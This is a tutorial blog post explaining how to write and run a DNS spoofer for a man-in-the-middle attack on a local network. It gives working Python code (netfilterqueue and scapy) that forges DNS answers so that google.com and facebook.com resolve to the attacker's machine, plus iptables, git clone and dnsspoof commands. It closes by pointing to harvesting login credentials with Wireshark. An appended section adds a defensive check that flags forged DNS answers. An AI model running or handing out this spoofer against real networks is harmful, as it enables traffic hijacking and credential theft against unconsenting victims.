WRITING YOUR OWN DNS SPOOFER PROGRAM : Coding for Cyber Security Program №3.


How does a DNS SPOOFER work?

This is a man-in-the-middle attack, so there are three entities:

  1. The victim
  2. The attacker (I am using Kali Linux 2020.3)
  3. The Access Point/Gateway

The victim sends requests to the Access Point. The attacker sniffs them, modifies them, and sends the modified malicious requests to the Access Point on behalf of the victim. The attacker does this by creating a queue of packets, storing all the requests, modifying them using a program and then sending them to the Access Point.

Similarly, the responses of the Access Point are stored in a queue, modified by the attacker using a program and then sent to the victim.

We will use the netfilterqueue Python module to access the packets matched by the iptables rule. Run the following command in the terminal to install netfilterqueue.

# pip install netfilterqueue

Create a dictionary that maps the domain names to spoof to the local IP of the attacker machine.

hosts = {
    b"www.google.com.": "",
    b"google.com.": "",
    b"facebook.com.": "",
}

  1. We can accept the packets using the following code.

import netfilterqueue

# accepting the packet
def pkt_process(packet):
    packet.accept()

q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)
q.run()

  2. Or drop them:

import netfilterqueue

# dropping the packet
def pkt_process(packet):
    packet.drop()

q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)
q.run()

We will choose to accept the packets, and now work with the requests and responses. We use DNSRR (Resource Record) to edit the request and DNSQR (Question Record) to edit the response.

import scapy.all as scapy

# handling requests and responses
def pkt_process(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        print("[Before Modification ]:", scapy_packet.summary())
        try:
            scapy_packet = modify_packet(scapy_packet)
        except IndexError:
            pass  # expected layer missing; leave the packet unchanged
        print("[After Modification ]:", scapy_packet.summary())
        packet.set_payload(bytes(scapy_packet))
    packet.accept()


We need to modify the request, and to do that we will run the following code:

# modifying the results
def modify_packet(packet):
    qname = packet[scapy.DNSQR].qname
    if qname not in hosts:
        print("Invalid DNS Host:", qname)
        return packet
    packet[scapy.DNS].an = scapy.DNSRR(rrname=qname, rdata=hosts[qname])
    packet[scapy.DNS].ancount = 1

Some of the fields must be deleted from the packet because they correlate to the original request. So we use the scapy module to delete them from the scapy packet that we have captured, and scapy recalculates them with new values that match the modified packet.

    # removing some fields so that scapy can recalculate them
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.UDP].len
    del packet[scapy.UDP].chksum
    return packet

Import the os module and use it to run the iptables command:

import os
from netfilterqueue import NetfilterQueue

QUEUE_NUM = 0
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
q = NetfilterQueue()
try:
    q.bind(QUEUE_NUM, pkt_process)
    q.run()
except KeyboardInterrupt:
    # flush the iptables rules again on Ctrl+C
    os.system("iptables --flush")

Our code will look like this after performing all the above steps :


Step 1: To use the DNS spoofer program, you need to run the ARP SPOOFER (explained in the previous article).


Step 2: While ARP SPOOF is running in one terminal, open another terminal and run DNS SPOOF using either of the following methods:

  1. You can use my GITHUB CODE :
# pip install netfilterqueue
# service apache2 start
# git clone https://github.com/An4ndita/dns-spoof
# cd dns-spoof
# mousepad dns.py

Edit lines 5, 6 and 7, using the following format to enter each domain name to be spoofed alongside the IP of the attacker machine:

b"example.com" : "Your IP"

Now save it and run the following command :

# python3 dns.py

When the victim browses to the listed web pages, they will see the website hosted by the attacker instead of the legitimate website.

  2. You can also use the dnsspoof tool built into Kali Linux for this purpose. Follow these steps to use dnsspoof:

Create a file named spoofhost.txt, edit it in the following format and save it:

<attacker’s ip> <Domain to be spoofed>

# mousepad /etc/spoofhost.txt

10.0.2.15 mail* www* www.example.* *.example.com

Run the following commands :

# echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
# dnsspoof -f spoofhost.txt host <victim's ip> and udp port 53

(<victim's ip> is the IP address of the victim machine)

Now you can see the results using Wireshark if you have spoofed a website that accepts login credentials.
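
A defender's view of the forged reply that modify_packet produces, as an added example that is not part of the original article or its repository: it parses a raw DNS response and flags A records for watched public names that resolve to a non-global address such as the attacker's LAN IP. The names WATCHED, read_name, a_records, spoof_suspects and build_response are hypothetical, the sample packets are constructed, and it assumes the watched zones never legitimately resolve to private addresses.

```python
import ipaddress
import struct

WATCHED = ("google.com.", "facebook.com.")  # assumption: public zones taken from the hosts dict

def read_name(msg, off):
    """Decode the DNS name at off; return (name, offset just past it)."""
    labels, end, hops = [], None, 0
    while msg[off]:
        if msg[off] & 0xC0 == 0xC0:              # compression pointer
            end = off + 2 if end is None else end
            off = ((msg[off] & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        labels.append(msg[off + 1:off + 1 + msg[off]].decode("ascii", "replace").lower())
        off += 1 + msg[off]
    return ".".join(labels) + ".", (off + 1 if end is None else end)

def a_records(msg):
    """Parse a DNS response (UDP payload); return (qname, [IPv4Address, ...])."""
    _id, flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    if not flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question DNS response")
    qname, off = read_name(msg, 12)
    off += 4                                     # skip QTYPE and QCLASS
    addrs = []
    for _ in range(an):
        _, off = read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if rtype == 1 and rclass == 1 and rdlen == 4:   # A record, class IN
            addrs.append(ipaddress.IPv4Address(msg[off + 10:off + 14]))
        off += 10 + rdlen
    return qname, addrs

def spoof_suspects(msg, public_zones):
    """Return [(qname, ip)] for watched public names answered with non-global IPs."""
    qname, addrs = a_records(msg)
    if not any(qname == z or qname.endswith("." + z) for z in public_zones):
        return []
    return [(qname, str(ip)) for ip in addrs if not ip.is_global]

def build_response(qname, ip, ttl=0):
    """Constructed sample: one question, one A answer using a compression pointer."""
    q = b"".join(bytes([len(lab)]) + lab.encode() for lab in qname.rstrip(".").split(".")) + b"\0"
    hdr = struct.pack("!6H", 0x1234, 0x8180, 1, 1, 0, 0)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return hdr + q + struct.pack("!HH", 1, 1) + rr
```

Feed spoof_suspects the UDP payload of each port 53 response seen on a client or a monitoring port; internal split-horizon zones stay out of the watch list so that their private answers are not flagged.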

Thanks for reading. Hope that you find it useful 🙂🙂
